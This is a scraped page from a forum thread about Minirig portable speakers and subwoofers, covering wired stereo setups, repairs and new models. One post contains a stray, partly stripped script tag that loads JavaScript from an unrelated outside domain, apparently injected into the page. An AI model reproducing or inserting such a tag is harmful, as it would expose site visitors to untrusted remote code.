Speakerplans.com Homepage
Forum Home Forum Home > General > 12v Powered Systems
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Minirig

Post Reply Post Reply Page  <12345 79>
Author
Message Reverse Sort Order
Joji View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Joji Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 8:49pm
>>Stereonerd, Hello and welcome to the site!

the RED and WHITE are each in MONO, so any sub that you choose to connect out will only play that signal. I have been using the wired setup for years now. It works well!

Only when using the BT APP for wireless connection do you need to actually specify which minirig plays the left and the right channels
< ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">
Stereonerd View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Stereonerd Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 8:41pm
Thank you so much for your response!

The connection you describe sounds intuitively correct. And as I mentioned, I have three of those special MiniRig cables. 

But I am somewhat unsure of your suggestion because if one looks at the "Right" plug (has the red collar) and the "left" plug (white collar) one sees that they are not mono plugs. Each of them are "stereo" plugs. (In other words, ALL three of the plugs on that cable are identical and imply they can send more than one channel.) 

The good folks at Minirig have designed in a tremendous amount of multi-functionality...one can use one speaker in mono, two (or more) speakers in mono, two speakers in stereo, 2.1 stereo systems, 2.2 stereo systems, 2.2 stereo but with summed subs, wired set-ups, bluetooth setups, etc. It is great; but because each speaker can be tweaked through the App to do all of these set-ups, it can get confusing.

So because of all that multi-functionality and the "stereo" plugs, I am still not sure. But so far, I am thinking your idea is the most likely.

Thoughts?

Edited by Stereonerd - 24 June 2019 at 8:42pm
MattSPL View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote MattSPL Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 8:26pm
You’ll love the minirig 3, seriously loud :)

You need a stereo splitter cable available from minirigs. This goes from a stereo jack from your phone to 2 mono jacks. Plug one into each speaker, then your usual jack to jack cable from each speaker to each sub.

This should work, but I haven’t actually tried it as I’ve only 1 sub.

Stereonerd View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Stereonerd Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 8:21pm
Hi!
New kid here. But I am a long-time Minirig owner. I have the original V1 speakers and a sub Naturally, it can only play when set up with wired connections.

But I just ordered the V3 speakers and TWO subs. (YAY!)

I know how to set them up for 2.2 (true stereo subs) when using the speakers with Bluetooth. (Obviously, a cable connects the left speaker to the left sub and a similar cable connects the right sub to the right speaker.)

>>>But HOW does one wire them for true 2.2 stereo when one wants to ONLY use a wired connection?
I have searched quite a bit and do not see how to do this (the various videos that show 2.2, 2.1 and other combos NEVER show the wiring. Does the wired connection (whatever it is) work WITHOUT the aid of the App? Or does one need to make initial contact with the speakers, tell them to be stereo, and then make wired connections???

I have multiple Minirig cables, both the plain, 3.5mm "stereo" mini-plug as well as several of the special cables to connect a sub. 

Just to be clear, I want to guarantee that one sub and one speaker play only the left and the other sub and other speaker to play only the right channel. 

THANK YOU IN ADVANCE!
MattSPL View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote MattSPL Quote  Post ReplyReply Direct Link To This Post Posted: 14 February 2019 at 10:38pm
I would send it back for repair
kosenn View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote kosenn Quote  Post ReplyReply Direct Link To This Post Posted: 14 February 2019 at 10:30pm
I dropped my Minirig Mini speaker and now the sound is very distorted, even at low volume. Is there a way to fix it myself or do I have to send it back for repair?
MattSPL View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote MattSPL Quote  Post ReplyReply Direct Link To This Post Posted: 16 December 2018 at 10:59am
Minirig 3 available now!
MattSPL View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote MattSPL Quote  Post ReplyReply Direct Link To This Post Posted: 23 November 2018 at 8:55pm
Interesting. Look forward to hearing more.
semaj8james View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote semaj8james Quote  Post ReplyReply Direct Link To This Post Posted: 13 November 2018 at 12:35pm
Looks like the MRBT-3 is due to launch soon!

https://fccid.io/2AD65MRBT3

Tests and such have been submitted to the FCC. That means the end design and such is complete and we'll be seein a 3rd Gen Bluetooth coming out soon! Fingers crossed for APTx and other fun stuff! Can't wait to get one:)
rosssss224 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote rosssss224 Quote  Post ReplyReply Direct Link To This Post Posted: 07 October 2018 at 11:40am
My minirig which has served me well since 2013ish got some water damage in my tent. Consequently it switches on but makes random loud cracks / white noise burst and won't play. I opened it up and dried it out but no luck. Anyone had a similar issue by any chance? Hoping its a relatively straightforward fix...
MattSPL View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote MattSPL Quote  Post ReplyReply Direct Link To This Post Posted: 06 October 2018 at 5:50pm
Had the Minirig Sub a few days now and have put it through its paces. It’s amazing to say the least, can’t believe how much punchy bass it creates, especially when placed in a bay window in a house I’ve been wiring. Definitely Worh buying and I think this is Minirigs finest product.
MattSPL View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote MattSPL Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2018 at 10:34pm
I’ve an MRBT2 and a mini, just ordered a sub and can’t wait to hear it. 
Any more updates or new products in the pipeline?
I’d like to see a large Minirig with a really high end driver in it.
 Post Reply Post Reply Page  <12345 79>